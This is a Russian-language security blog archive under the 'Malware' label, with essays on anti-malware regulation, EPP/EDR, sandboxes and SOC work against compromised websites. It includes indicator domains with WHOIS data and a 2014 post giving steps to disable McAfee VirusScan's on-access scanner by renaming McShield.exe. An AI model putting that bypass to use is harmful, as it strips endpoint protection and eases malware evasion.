Showing posts with label Malware. Show all posts
Showing posts with label Malware. Show all posts

Sunday, August 12, 2018

Инерция

Инерция – это физическое явление сохранения скорости тела постоянной, если на него не действуют другие тела или их действие скомпенсировано
(Из учебника Физики за 7 класс)

Уже писал о том, что требование использования различных СЗИ от ВПО в инфраструктуре не добаляет безопасности. Однако, это требование по-прежнему есть в СТО БР ИББС и 382-П, вот, например, цитата из последнего:
"2.7.3. Оператор по переводу денежных средств, банковский платежный агент (субагент), оператор услуг платежной инфраструктуры обеспечивают использование технических средств защиты информации от воздействия вредоносного кода различных производителей и их раздельную установку на персональных электронных вычислительных машинах и серверах, используемых для осуществления переводов денежных средств, а также на межсетевых экранах, задействованных в осуществлении переводов денежных средств, при наличии технической возможности."
Согласен, что Положение устаревшее, написано в 2012 году, но проблема в том, что и сейчас, на закате 2018, его по-прежнему пытаются исполнять, продолжая увеличивать энтропию там, где, напротив, требуется порядок.

Как использование двух паролей не считается двухфакторной аутентификацией, так и использование двух эквивалентных систем не является эшелонированной обороной, смысл имеет только полностью различные подходы - об этом писал и в 2013, и год назад, а также рассказывал намедни.

Боль в том, что уже понимая низкую эффективность автоматически привентивных средств защиты, мы на уровне регулятора продолжаем культивировать веру в них.

Но нет смысла писать про то же самое, если дело только создании неправильных стереорипов. Основная проблема в том, что требование использования гетерогенного покрытия инфраструктуры средствами защиты - снижает возможности по обнаружению сложных атак, проще говоря, - вредит безопасности. Логика эта на поверхности. Если говорить о целевых атаках, то они тщательно готовятся, безусловно, беря во внимание испльзуемые средства защиты, поэтому предотвратить такую атаку исключительно превентивными автоматами практически невозможно. В этих условиях мы вынуждены отступать, сдвигая приоритеты от предотвращения в сторону обнаружения, поиска и реагирования. Ключевым моментом для эффективного обнаружения является - visibility (попробую перевести это как "наглядность-обзорность") - надо в едином месте обозревать все данные со всей инфраструктуры. Если говорить о endpoint-е, то поставщиком таких данных является EPP-EDR. Все нормальные EPP-вендоры это уже давно поняли это и оснастили свои автоматические Anti-malware-движки агентами EDR и сервисным предложением над ними, потому что только такой полный стек обеспечивает более-менее высокую эффективность.
Требование наличия решений разных роизводителей на разных частях инфраструктуры (например, один вендор - на рабочих станциях, другой - на серверах) приводит к раздроблению наглядности-обзорности на части, что снижает возможности по обнаружению атаки после взлома. Ну, или, как минимум, значительно усложняет обнаружение и активный поиск угроз (Threat hunting).

Серьезные атаки можно адресовать только после взлома, но мы жертвуем нашей способностью по обнаружению постэксплуатации в пользу малоэффективного предотвращения, да возможностей по предотвращению это особо не добавляет.

К сожалению, снова складывается ситуация, когда требования регуляторов отстают от реальности и этим становятся, как минимум - бесполезными, а как максимум - мешающими. Что делать - понятно: активнее обновлять документы, чтобы они были актуальны современному ландшафту угроз. Эпоха веры в полностью автоматическое предотвращение всевозможных атак - давно ушла в прошлое, вместе с ней и вера в мультисканеры, - это должно привести к соответсвующим изменениям нормативных требований, инерции здесь не место.


Saturday, February 3, 2018

Антивирусы и Песочницы

Не раз писал, что ни одна технология не является серебряной пулей от всего спектра возможных угроз, и только их совокупность, поскольку любой подход имеет свои плюсы и минусы, что делает его эффективным в одних случаях и практически бесполезным в других. Аналогично в здесь: некорректно утверждать, что песочницы более эффективны, или обратное.

Песочницы имеют преимущество - поскольку это выделенная среда, она не имеет ресурсных ограничений, что позволяет выполнять сколь угодно глубокую эмуляцию без риска нарушения нормального функционирования системы. Их нестрашно сломать, поэтому можно без риска выполнять нестабильные проверки, часто дающие более качественный результат. Очевидным недостатком является искусственность среды, которую крайне сложно скрыть, поэтому ВПО, с применением известных усилий, практически всегда может установить, что оно запущено в песочнице и демонстрировать иное поведение. В целом, ПО пытающееся установить, что оно запущено под эмуляцией, уже за эти попытки можно детектить, однако определить нелигитимность (да и вообще, наличие) таких проверок не всегда возможно, поскольку техник инвентаризировать свое окружение великое множество, начиная с банальной проверки подписи драйверов оборудования, и заканчивая применением машобуча для классификации действий пользователя, чтобы отличить автомата-эмулятора от реально работающего пользователя.

Anti-malware (АМ) движки - напротив, представляют собой реальную среду исполнения ВПО и поэтому дают максимально достоверные сведения об исполнении ПО в фактическом окружении. Реальные рабочие станции предоставляют более достоверную информацию для анализа. Но, поскольку реальные системы должны выполнять реальные задачи, а не функцию исследовательской инфраструктуры, возможно наличие ресурсных ограничений, не позволяющих "дотянуться" до всех интересующих компонентов. Ну и, конечно, ни о каких нестабильных перехватах речи идти не может.

Видно, что преимущества одной технологии одновременно являются недостатками другой, поэтому и в этом случае только комбинация подходов покажет максимальную эффективность.

Thursday, November 2, 2017

EPP и EDR с позиции Заказчика

- Вам чай или кофе?
- Чай.
- Вам черный или зеленый?
- Черный!
- Вам с бергамотом или без?
- Без!!
- Вам с сахаром или без?
- С сахаром!!!
- Вам сахар коричневый или простой?
- Уважаемая, дай мне уж, пожалуйста, хоть что-нибудь!!!!

(личный опыт общения в ресторане гостиницы)

Очевидно, что любую атаку прежде всего желательно остановить, причем, максимально быстро, т.е. автоматически. Этим занимаются Endpoint protection platforms - EPP. Однако, понятны и принципиальны ограничения превентивного автомата: а) у него нет права на ошибку, поэтому обречен убивать только 100% зло, и поэтому плохо работает против атак без применения гарантированно вредоносных инструментов (== атак без применения ВПО), да и вообще, убивать только инструменты дело неблагодарное, ибо их несложно сделать великое множество; б) человек всегда может обмануть автомат; в) подход все же реактивен.

Поэтому то, что мы не можем обезвредить автоматически, мы должны уметь хотя бы обнаружить, опять же - быстро, т.е. желательно автоматически. Принципиальное преимущество (как бы это ни странно звучало) детективного подхода - право на ошибку, - последствия от ложных срабатываний детектирующей системы не будут столь драматичны, а такая свобода позволяет обнаруживать больший спектр атак. Но появляется задача "разгребания" ложных срабатываний, конфигурации системы с учетом situational awareness, ... - оплатой большей широты покрытия является обязательное наличие операционной безопасности. Но, тем не менее, риски, связанные с проигрывающей человеку автоматической логикой (б) и реактивностью (в), - сохраняются как и в первом случае.

Отступая еще дальше с целью находить атаки, для которых нет автоматической, даже детектирующей, логики, мы попадаем в еще более широкую область Threat hunting-а. По сути своей - это такое же исследование атак, как это делает любой вендор решений безопасности, но перенесенное в инфраструктуру конкретного заказчика, потому что целевые атаки едва ли можно найти 'in the wild' и поэтому их надо уметь искать в конкретной сети. В стремлении не делать одну и ту же работу более одного раза, успешные трофеи после каждой охоты запиливаются либо в детекты ЕРР, ну, а если это тяжело\невозможно автоматически обезвредить, - в детекты, которые будет подхватывать в работу операционная безопасность (SOC). Концептуально понятно, что Threat hunting делается руками, поскольку наличие автоматизированных алертов любой степени "интеллектуальности" возвращает нас к детектирующим системам.

Все сказанное выше можно отобразить на простенькой схемке.

С точки зрения Заказчика, решающего одну задачу защиты от атак, понятно, что надо убивать все 100%-ное зло, там где все также есть индикаторы, но есть сомнения - сначала посрасследовать, а затем, если подтвердилась нефолса, убивать, ну а где и индикаторов нет - искать, искать и искать, подтверждения, что меня поломали.
Однако, исследователи рынка разбивают эту одну задачу, на разные, решаемые разными классами продуктов - EPP, EDR + всякие NG-*. Такое разделение культивирует в корне неправильное мнение об некой отсталости ЕРР от новых продвинутых технологий в составе EDR, тогда как любому здравомыслящему понятно, что оба подхода - звенья одной цепи, дающие результат только в совокупности. Такое искусственное дробление, где каждая из частей не дает желаемого результата напоминает историю о развешивании лейблов на различные типы ВПО с последующим выпуском многокомпонентных решений по защите.
Лично я против сложности и сторонник интеграции. Поэтому если в какой-то момент времени изменились ландшафт угроз\типы атак, надо не делать новый продукт, а обеспечивать чтобы существующий продолжал решать поставленные изначально перед ним задачи. Т.е. если EPP изначально придумывался для защиты от атак, то он и должен проходить по всем линиям "отступления" от автоматического лечения, через автоматическое обнаружение до Threat hunting-платформы, а не дробиться на части, эффективно работающие только на каком-то подмножестве проблематики, давая пищу для маркетинговых лозунгов о "legacy", "file-based AV" и пр. Ни EPP, ни EDR, ни NG-* по отдельности не решат задачу Заказчика защиты от [старых, новых, целевых] атак, а, следовательно, нужно предлагать и оценивать комплексные решения, эффективно работающие как против старых, так и против новых TTP, успешно детектирующие по всей "Пирамиде боли" на всех этапах.


Saturday, August 12, 2017

Next-gen

Старый конь борозды не испортит
(Поговорка)

Полагаю, не мне одному и не раз приходила мысль о том, что неожиданности лучше врезаются в память. Поэтому, в рекламах допускают орфографические ошибки, да и прославиться значительно проще, если придумать какой-нибудь радикальный взгляд, что привело к появлению великого множества паранаук, псевдоисторических фильмов, новых прочтений и прочей почвы для "шокового маркетинга", когда эмоциональное потрясение\удивление\неожиданность\неготовность трансформируют в почти рациональные убеждения.

Примерно к таким же мыслям прихожу, когда читаю некоторые маркетинговые листовки о защитах нового поколения, включающих в себя все новомодные базворды: machine learning, artificial intelligence, deep learning, behavioral monitoring,..., next-generation. В этих же публикациях, как правило, не брезгают и покидаться грязью в "legacy AV", "signature-based" и т.п.

Что не так? Продолжим серию разоблачений...
Во-первых, по моему мнению "signature-based legacy AV" уже просто нет (если они еще остались, то скоро вымрут как динозавры). Против современных этак это не работает, это понятно, и надо быть полным невеждой, думая, что антималварные вендоры, кто всю свою историю занимаются поиском новых атак, чтобы в сложнейшей конкурентной борьбе, обеспечить свой detect rate, этого не понимают. Очевидно, производители АВЗ первыми сталкивались с новыми атаками и соответствующим образом развивали свои детектирующие технологии. Весной 2015, когда я работал еще в Заказчике, для меня эта логика была очевидной догадкой, сейчас, работая в Поставщике, я могу с уверенностью сказать - все, что можно продетектить и пролечить автоматически - продетекчивается и пролечивается автоматически, и, безусловно, "legacy" здесь недостаточно, поэтому ими все не ограничивается. Правда, не все можно обнаружить исключительно автоматически - но об этом дальше...

Во-вторых, "сигнатуры" могут быть не только на примитивные последовательности байтов, как многие думают. Они могут быть также и на поведение, "аномалия" - это тоже сигнатура - отклонение от такого-то порога, выход из такой-то статистической зависимости. На слайде 9 рассказывалось о концепции "ханта" - одного из множества используемых подходов к обнаружению - это некоторый квант аномального поведения (например, запуск командного интерпретатора из офисного приложения, или обращение в Интернет не от браузера, или несоответствие имени\пути файла его хешу и т.п.), совокупность которых анализируется при принятии решения о "подозрительности" того или иного наблюдения - это тоже сигнатура. В любом случае, если мы не говорим о каком-то самообучающимся машобуче, нам нужно автоматизированной системе пояснить, "что такое "хорошо", и что такое "плохо" - сигнатура - это один из распространеннейших способов такого пояснения.

В-третьих, есть масса фактов (раз, два, три, четыре, пять и т.п.) демонстрирующих, недостаточность, исключительно новомодных технологий. Тут масса причин: и то, что грань межу "целевой" и "обычной" атакой размыта (писали - вот подтверждение), и то, что и в целевых атаках используется "обычная" malware, и то, что есть миллион+1 вариант, когда никакими анализаторами аномалий нет возможности различить вредоносное поведение файла, и несравненно дешевле сделать детект на семейство файликов, чем стрелять по воробьям сложными математическими вычислениями (даже если они выполняются исключительно в облаке и не грузят endpoint), ... в общем, думаю, не надо быть гениальным, чтобы поверить, что разные технологии показывают разную эффективность в различных сценариях. Поскольку сценариев атак может быть великое множество, для обеспечения эффективности нужно иметь великое множество технологий и только их комбинация может дать желаемый результат. А все эти потуги возвышения "нового" за счет унижения "старого" - дешевый "технологический" маркетинг, попытки хоть чем-то обосновать "революционность" своего решения, что, на мой взгляд, в глазах думающего и понимающего потребителя имеет обратный эффект.

Именно поэтому новые технологии, использующие большие данные, машинное обучение, распределенные вычисления, облака - не вытесняют "легаси", а гармонично дополняют. А "новое поколение" - это не то, что реализует только новые подходы, а то, что реализует все, что показывает максимальную эффективность и результативность на современном ландшафте угроз.

Но даже и этого мало! Современные атаки реализуются людьми и противостоять им исключительно автоматически - невозможно, - все та же проблема с обходом средств защиты (новые навороченные автоматы, да, они более продвинуты, но, в любому случае, они - автоматы) и, поэтому, они [всегда, всегда, всегда] могут быть обойдены. И этот сценарий - компенсируется работой команды, не менее квалифицированной, чем атакующие, и использующей все эти новомодные средства не как стену за которую можно спрятаться, но как инструменты (оружие, если хотите) для активного обнаружения и противодействия.

Sunday, May 14, 2017

Спички детям - не игрушка!

Мы прячем спички\ножи\пистолеты от детей, чтобы они не покалечили окружающих, однако то же самое, но кибер-, - разбрасываем непотребнейшим образом - совсем недавно мы писали, и вот получили.

Но ситуация не только в этом, - мы все увлеклись погоней за защитой от 0-day, от APT и прочих advanced-, targeted-, sophisticated-, а надо - просто ставить патчи!

Sunday, November 15, 2015

Доверие в закрытых группах

Когда говорят о борьбе с организованным глобальным злом, так или иначе выходят на необходимость объединения усилий, обмена информацией, и т.п., типа, давайте сделаем закрытые группы. В эти закрытые группы включают все больше участников, и ..., по-моему, в конце мы получим то же, что было на заре Интернет. Как известно, Интернет также делался в предположении, что все, кто подключается в сеть - хорошие ребята, - такое превышение Доверия над Осторожностью привело к тому, что появилась наша профессия, Безопасники, и в перспективе народ не собирается меняться, поэтому работы не планируется меньше. Закрытые группы также могут повторить судьбу сети Интернет: увеличение количества членов ведет к снижению доверия внутри группы, что создает необходимость, может, создания еще более закрытой группы внутри существующей закрытой группы,... - и так можно бесконечно повторять [историю сети Интернет]. Хочется ошибаться, но уже сейчас можно прогнозировать заливы левых (а может, и вредоносных) IoC-ов в публичные фиды и прочий саботаж, причем продуманный как с позиции сокрытия факта инсайда, так и с позиции нанесения наибольшего ущерба деятельности группы (предполагается, что системные злодеи будут действовать системно, т.е. результативно).
К сожалению, я не вижу эффективных способов защиты закрытых групп, - ситуация та же, что и попытка защитить страну от шпионов, - с этим можно как-то бороться, однако, серебряной пули не наблюдается. Еще одним отягчающим обстоятельством является наша необходимость действия в рамках правового поля - понятная аналогия здесь, что предательство правоохранительных органов закончится судом, а он у нас самый гуманный, а предательство мафии едва ли обойдется гуманным исходом.

Но что-то же делать придется, хоть Зло старается пуще Добра? Попробуем наметить идеи.
1. "Поручительство". Чтобы кого-то включили в группу за него должны поручиться действующие члены.
2. "Сегментация" внутри группы. Сведения, доступные в группе должны быть классифицированы, каждый член имеет определенный уровень разрешений, дающий право доступа к определенным сведениям, иными словами - внутри группы реализована мандатная модель доступа.
3. "Постоянный подсчет рейтинга". Здесь о том, что каждый член должен иметь свой рейтинг, который он зарабатывает исключительно вкладом в победу зла, никаких "за выслугу лет" и т.п. - подбил вражеский танк, - получил звезду, прибавку к рейтингу. Система подсчета рейтинга должна быть прозрачной и понятной для всех членов группы, она должна отражать степень доверия, т.е. система вычисления рейтинга должна быть составлена так, чтобы в известной степени гарантировать, что член тем более не саботажник и инсайдер, чем выше его рейтинг. Должна быть понятная схема пересчета рейтинга в уровень разрешений, используемых в получении доступа к сведениям, циркулирующим в группе. Важный момент, что рейтинг должен не только добавляться, но и отниматься, причем отниматься должен более жестоко, чем увеличиваться - это простимулирует членов внимательно думать надо тем что они подтверждают, за кого ручаются и что делают. Чтобы при этом люди не отмораживались, пытаясь не испортить себе рейтинг, его можно сделать протухающим - это позволит снизить риск того, что белый и пушистый ранее член в настоящий момент надел серую или черную шляпу, - рейтинг должен отражать актуальный уровень доверия. Вообще, этот рейтинг - краеугольный камень всей безопасности группы, поэтому он должен быть максимально продуман. Скорее всего он должен отражать несколько перспектив поведения члена: число подвигов, эффективность и результативность каждого подвига, распределение подвигов во времени, изменение рейтинга члена во времени, продолжительность успешного участия в группе, подвиги членов, за которых поручился данный член, какие-то прибавки от Регулятора (см. далее), скажем, учитывающие участие во внутренних расследованиях. Рейтинг должен быть прозрачен и каждый член должен иметь возможность просмотреть историю подвигов и как это меняло рейтинг каждого члена.
4. "Изначальное доверие". Как в случае БЛВС бывают левые точки доступа, так и группы могут быть созданы изначально негодяями. Чтобы этого избежать, не могу придумать ничего более умного, как необходимость изначальной организации этих групп правоохранительными органами - вот здесь, как раз, и появляется потребность в Регуляторе, абсолютно доверенном. Та же потребность наблюдается и при проведении внутренних расследований.
5. "Круговая порука". Каждое решение внутри группы должно проходить согласование, иными словами, набирать рейтинг. Допустим наша группа выпускает все те же IoC-и, чтобы на него стали полагаться (например, он был куда-то опубликован) он должен быть подтвержден несколькими участниками группы. При этом, можно учитывать: что подтвердили решение не те, кто когда-то поддерживали вступление автора этого решения в группу; рейтинг голосующего, скажем, чем выше рейтинг, тем более достоверным считается подтверждение.
6. "Коллективная безопасность". Надо всем и каждому в отдельности быть бдительными и любые подозрения в чьем-либо предательстве тщательно расследовать. Рассчитывать инициативную группу внутреннего расследования также можно по личному рейтингу. Например, TOP N членов группы проводят расследования по каждому случаю подозрений внутри группы. Подозрения можно публиковать, скажем, анонимно, при этом тот, по кому разбираются, конечно же не должен ни о чем догадываться. Решение о проведении расследования и формировании группы расследования из рекомендованных TOP N должен принимать кто-то с абсолютным довериям, - мы уже знакомы с Регулятором.
7. "Личное тестирование" с целью вычисления засланцев. Идеально - применение полиграфа. Но, в целом, можно использовать и психологические тесты или просто собеседования, направленные на достижение той же цели.
8. "Вечная память". Члена, выгнанного из группы за саботаж надо запоминать навсегда. Если он когда-то был замешен в работе на злодеев, не надо это никогда забывать, и впредь никогда не надо включать в закрытые группы белых и пушистых. Опущенное до нуля (или до отрицательного значения) доверие не должно восстанавливается.
9. "Формальное согласование Кодекса". Банально должен быть Кодекс [этики] который электронно подписывают все члены группы. Кодекс нельзя нарушать, нарушение Кодекса - повод для исключения из группы и обречение на "вечную память".

Friday, April 17, 2015

Комплексная услуга

Читая книжку Practical malware analysis (кстати, обалденная книжка) пытаюсь найти применение этим знаниям для CISO и прихожу к выводу, что держать в штате заказчика таких ребят не надо, - разумнее это аутсорсить. Очевидно, что аутсорсить надо у того, кто это здорово делает и у кого объемы этой работы таковы, что ее себестоимость низкая. Кто же это такие :) ? Антивирусные вендоры!
Может, я, конечно, отстал от жизни и на рынке есть подобные предложения, но я не могу понять почему антивирусные вендоры не продают вместе со своими продуктами сервис по анализу и противодействию таргетированным атакам, против которых их продукты, очевидно, бессильны. Это позволило бы представить на рынке комплексную услугу.

Заказчику такая услуга интересна в том плане, что она комплексная и, очевидно, более эффективная чем всякие лозунги про эффективность автоматов и типовых подходов против APT. Автомат не способен адаптироваться, поступать нестандартно, здесь нужна работа человека... Да и вообще, пускай с профессионалами сражаются профессионалы!
Мое мнение, что в перспективе нас ожидают исключительно таргетированные атаки, поскольку мы почти все электрифицировали и разместили в Интернете, что позволят получать не виданный ранее профит, измеряемый миллионами рублей, а, вместе с тем, заказная разработка софта - 100 т.р. + способность поставить правильно задачу (написать техтребования).
Я это все говорю к тому, что автоматическая борьба с зловредами уже неэффективна и в недалеком будущем вообще превратится в профанацию, поэтому антивирусным вендорам надо задуматься об адаптации к ситуации и выводить на рынок более эффективные продукты\сервисы...

Прежде, чем описывать почему этот сервис будет выгоде антивирусному вендору. Попробую пофантазировать как этот сервис мог бы выглядеть.
1. Заказчик как-то узнал, что его поимели, да хоть даже из новостей... ну если не узнал никак, то он вряд ли будет заказчиком этого сервиса :) - вообще, сейчас мир таков, что есть только два типа заказчиков: которых имеют и они об этом знают и которых имеют и они об этом не знают, поэтому, если вы ничего не видите - это очень плохой знак!. Обращается на сервисную линию, ему выделяется телефонный эксперт, который помогает ему собрать необходимый эвиденс. Тут вендор может вложиться в курсы для своих заказчиков по компьютерной криминалистике, и этот шаг в большинстве случае будет пропущен - заказчик будет в состоянии собрать все что нужно, и как это нужно. Ну, или можно предоставлять автоматизированные инструменты для сбора.
2. Вендор, получив все это анализирует:
- выпускает экстру которая сразу позволит как-то "вылечить" проблему,
- помогает найти ответы на вопросы "что за негодяй", "какой мотив" и т.п. с чем можно пойти в милицию,
- помогает с "Lessons learned": что за уязвимость, как ее закрыть\снизить риск и т.п.
3. Все

Теперь, почему это выгодно антивирусному вендору. Во-первых, этот сервис недорог по себестоимости: ребята все равно это делают постоянно. Во-вторых, - это отличный источник информации для наполнения своих баз и вообще своего R&D. В-третьих, несмотря на то, что это R&D - это будет непосредственно финансироваться заказчиком (!!!) и это не надо будет прятать куда-то в стоимость поддержки\лицензий и т.п.

По-моему обалденная перспектива для всех. Надо брать и внедрять!

Sunday, July 13, 2014

Простейший способ отключения McAfee VirusScan

Иногда есть потребность поработать с различного рода инструментами, а антивирус мешает.
Первая мысль - пойти в Сервисы и отключить сервис "McAfee McShield" - если верить комментарию к сервису, это как раз то, что отвечает за сканирование при доступе (On-Access Scanner). Однако, возможность выключить через интерфейс недоступна и режим запуска тоже поменять не получается.
Что ж, ищем McShield.exe среди процессов в Таскменеджере - он там находится, убиваем - убивается. Радуемся, работаем, но в какой-то момент McShield.exe снова поднимается и все портит. Разбираться кто его поднимает - лень, но надо все-таки как-то сделать, чтобы не поднялся.
Решение до безобразия просто - переименовать файлик McShield.exe так, чтобы пытающийся поднять его не нашел. 
Итак, файлик "C:\Program Files (x86)\McAfee\VirusScan Enterprise\x64\McShield.exe" (путь можно посмотреть в свойствах сервиса "McAfee McShield") переименовываем в то, что нравится, - я добавил единичку в конце. Больше McAfee меня не беспокоил.

Важно: Когда закончили свои занимательные упражнения - обязательно переименуйте файлик обратно, - крайне не рекомендую отключать антивирус навсегда!

Saturday, November 12, 2011

REG.ru нам не поможет :-(

Стали фиксировать некоторые изменения в развитии проблемы. Если раньше эксплоиты и зловреды хостились на индийских доменах (закрыли их весьма просто regExp-ом: "\.in$"), то сейчас - на наших отечественных. Причем здесь наблюдаются еще элементы социальной инженерии - мол, проблемы у вас с IE, давайте мы вам починим....

Что же это за домены *ie.ru??

http://www.reg.ru/i/newdomain/globe.png01ie.ru

IP-адрес: 46.4.82.48

По данным WHOIS.RIPN.NET:

Домен:

01IE.RU

Сервер DNS:

ns3.fastvps.ru.

Сервер DNS:

ns4.fastvps.ru.

Статус:

зарегистрирован, делегирован, не проверен

Администратор домена:

Частное лицо "Private Person"

E-mail:

poshli@nahuy.ru

Регистратор:

REGRU-REG-RIPN

Дата регистрации:

2011.11.01

Дата окончания регистрации:

2012.11.01

Источник:

TCI

http://www.reg.ru/i/newdomain/globe.png02ie.ru

IP-адрес: 46.4.82.48

По данным WHOIS.RIPN.NET:

Домен:

02IE.RU

Сервер DNS:

ns3.fastvps.ru.

Сервер DNS:

ns4.fastvps.ru.

Статус:

зарегистрирован, делегирован, не проверен

Администратор домена:

Частное лицо "Private Person"

E-mail:

poshli@nahuy.ru

Регистратор:

REGRU-REG-RIPN

Дата регистрации:

2011.11.01

Дата окончания регистрации:

2012.11.01

Источник:

TCI

http://www.reg.ru/i/newdomain/globe.png03ie.ru

IP-адрес: 46.4.82.48

По данным WHOIS.RIPN.NET:

Домен:

03IE.RU

Сервер DNS:

ns3.fastvps.ru.

Сервер DNS:

ns4.fastvps.ru.

Статус:

зарегистрирован, делегирован, не проверен

Администратор домена:

Частное лицо "Private Person"

E-mail:

poshli@nahuy.ru

Регистратор:

REGRU-REG-RIPN

Дата регистрации:

2011.11.01

Дата окончания регистрации:

2012.11.01

Источник:

TCI


Пишем в Reg.ru - так, мол и так, домены с владельцем (poshli@nahuy.ru ) хостят зловред, давайте их удалим. На следующий день получаем ответ, цитирую (не думаю, что я что-то нарушу процитировав его, но персоналии, на всякий случай, удалю):

> -----Original Message-----
> From: Клиентская служба [mailto:manager@reg.ru]
> Sent: Friday, November 11, 2011 2:03 PM
> To:
> Subject: Re: [Ticket#2011111010003016] Заявка "Домены 01ie.ru, 02ie.ru,
> 03ie.ru установка вредоносного ПО без ведома пользователя"
>
> Здравствуйте,
>
> ООО "Регистратор доменных имен РЕГ.РУ" является Аккредитованным
> регистратором доменных имен и осуществляет свою деятельность в строгом
> соответствии с Правилами регистрации и Регламентами. В соответствии с
> Правилами регистрации доменных имен в домене RU все операции с доменами
> осуществляются на основании заявок от Администратора домена. Если
> Администратором домена являетесь Вы, то Вы вправе на основании
> официального письма совершать любые действия с доменом, в том числе
> аннулировать регистрацию.
>
> Если Вы считаете, что информация, расположенная на домене, является
> незаконной, Вам следует обратиться к хостеру, который предоставляет
> хостинг для данного домена. Информацию о хостере Вы можете посмотреть,
> используя сервис WHOIS.
>
> Если Вы считаете, что Ваши права нарушены Администратором домена, Вам
> необходимо связаться с ним для выяснения обстоятельств. Контактную
> информацию об Администраторе Вы можете найти в WHOIS.
> В случае, если у Вас не получится уладить Ваши претензии к
> Администратору домена путем переговоров, Вы можете обратиться в суд в
> порядке искового производства.
> Мы, в свою очередь, вправе принять меры к Администратору домена (а
> именно, аннулировать регистрацию этого доменного имени) только на
> основании вступившего в законную силу судебного решения.
>
> В соответствии с Правилами регистрации доменных имен в домене RU
> Регистратор аннулирует регистрацию домена на основании судебного
> решения.
>
> "9.2. Регистратор самостоятельно прекращает право администрирования
> после получения доказательств наличия вступившего в законную силу
> решения суда:
> (1) запрещающего Администратору использовать в доменном имени
> обозначение, правами на которое обладает истец;
> (2) признающего администрирование домена Администратором нарушением
> прав истца (если применение такого средства восстановления нарушенного
> права не противоречит судебному решению)
> (3) иным образом обязывающего Администратора отказаться от доменного
> имени."
>
> --
> С уважением,
>
> Специалист Службы по работе с клиентами
> Регистратор доменных имен REG.RU
> Телефон: +7 (495) 580-11-11
> http://www.reg.ru
> http://рег.рф


В общем, идея коллективной взаимопомощи в мире где все всем по... не важно, умирает. Я не понимаю, почему REG.ru не может удалить эти домены на том простом основании, что предоставленные при регистрации данные не соответствуют действительности...

PS: написали в хостера. Реакции так же нет.

Wednesday, November 9, 2011

Сигнатурные антивирусы, прощайте

Продолжая потихоньку сражаться с проблемой, решил, таки посмотреть, что же там качают...

Приведу фрагмент странички, хостящей зловред:
Вот, что-то никогда не доводилось взглянуть, а как все интересно!
a - массив чудовищной длины, фактически байтов, которые там раскиданы по порядку, известному разработчику (в данном примере - обратный порядок).
Из этого "набора" потом в переменную s набирается побайтовым "выкусыванием", собственно, код, который затем выполняется в eval(s).

Какому-нибудь сканеру вредоносности кода, чтобы увидеть вредоносность надо его собрать, а чтобы его собрать надо знать алгоритм по которому он разбросан...

Тему можно дальше развивать до бесконечности:
- также набирать, скажем индекс "выкусывания",
- также набирать "опасные" команды, типа eval, substr, тп
- можно сильно усложнить алгоритм "выкусывания"
- ... человеческая фантазия безгранична ...
Полиморфизм, однако.

Можно попробовать что-то вроде песочницы, т.е. фактически выполнить код, как это сделал бы браузер. Делать это можно, если недолго (антивирус должен работать незаметно!). Но, можно же вставить искусственные задержки (sleep) , можно вставить естественные задержки, скажем, в цикле пытаться что-то поделать небыстрое, ... - пользователь замучится ждать, пока антивирус собирет - не вариант.

Печально что мой, не изощренный мозг, ограниченного горе-программиста с ходу придумывает такое количество схем обфускации, практически полностью убивающих идею обнаружения зловреда до его поражения жертвы, что же говорить о высококлассных профи :-(

Опыт показывает, что все эти сэмплы практически не детектятся никем из Virustotal, пока в соответствующие поддержки не пришлешь сэмплы и они не выпустят экстры. Что уж в этих экстрах - не разбирался, но судя по тому, что ровно такая же штука (с небольшими изменениями) срабатывает снова и снова, складывается недоброе впечатление что там чуть ли не сравнение по MD5 :-(

PS: я посмотрел в некий .class (использовал javap), там тоже белиберда и substr-ы (java/lang/String.substring). По ходу та же техника....

Thursday, November 3, 2011

О Рекламе и Антирекламе

Мы в нашем SOC-е уже давно трейсим проблему с переменным успехом: каждый день тонны новых сайтов, хостящих эксплоиты причем в чем угодно: pdf, swf, java, exe ... Куча сэмплов засылаются в антивирусных вендоров, virustotal напрягается, вендоры тоже, наш хелпдеск устал перезаливать десктопы, мы с ИТ-шниками постоянно в тонусе: ломаем голову как бы это закрыть на периметре, чтобы более не напрягало. Пока не понятно в чью пользу. Мы склонны думать, что это работает автомат, которого постоянно подкармливают эксплоитами и пейлоадами, а также потенциальными целями (выбираются наиболее посещаемые сайты) и снимают "урожай" уже компрометированных клиентов. Возможно, последние потом просто продаются, но это вопрос отдельного изучения.

Впечатляют масштабы этого безобразия: мы анализируем только посещения наших пользователей, да у нас большая сеть, но в масштабах Интернет - капля. Достаточно много вполне себе приличных сайтов новостей, известных на всю страну организаций взломано. Причем, когда мы сообщаем в соотвествующие поддержки сайтов и проблема устраняется, практически на следующий день снова наблюдаем хостящийся эксплоит :-)

Среди таких известных и в то же время уже разломанных сай
тов, с хостящимся эксплоитом - URA.RU. При заходе на сайт приятно видеть, что мой домашний Касперский не спит (думаю, любой из вас может это увидеть):

Здорово, правда? В целом, гордится не чем.

Однако, вполне себе приличная и известная Компания, специализирующаяся как раз на обеспечении информационной безопасности на своем сайте среди уважаемых клиентов с гордостью перечисляет:
Илья, если вы читаете, пожалуйста, помогите клиенту.

Размещать известных клиентов на своем сайте - общая практика. А ведь так просто этим же себе и навредить....

Я ни в коем случае не хотел бы в этом посте задеть чьи-либо интересы, нет. Я очередной раз задумался о том, что любая палка имеет как минимум два конца и, порой, преследуя одно, мы получаем совсем другое. Опыт показывает, что захачить можно практически любой сайт и совсем не значит, что его писали плохие разработчики и администрят плохие админы: слова "плохой" и "хороший" - относительны, а любая консалтинговая компания стремится обозначить своих клиентов, тем самым немного добавив в копилку мнения прохожего о качестве своих услуг.

Может, разве что, ссылки не давать со своего сайта, оставив одни логотипы :)

Thursday, October 20, 2011

Безопасность Web-приложений со стороны пользователя

Опыт анализа логов IDS и web-прокси только по одной компании полностью подтверждает написанное. Вообще, у меня сложилось впечатление, что:
1. Хостеры, сайтописатели и службы безопасности интернет-представительств либо плохо работают, либо вовсе не следят за своими сайтами. Первое время мы оповещали владельцев сайтов, что их сайт взломан и на нем хостится "что-то", что потом залетает к нашим пользователям, посещающим их сайт. После нескольких, достаточно веселых переписок, напоминающих легенду о вымирании динозавров (их тело было настолько большим, а нервная система настолько несовершенна, что нервный импульс от хвоста до мозга доходил несколько минут), я посчитал это занятие малоэффективным.
2. В Интернет существует просто громаднейшее количество сайтов, которые так или иначе скомпрометированы. Даже если сайт имеет Имя, совсем не значит, что он не может хостить "что-то", чего вы бы не хотели получить. К этому надо быть готовым.

К сожалению, никто кроме нас нам не поможет.

Как это выглядит? Приведу лишь словесное описание и один пример (, как это выглядит в лолгах.
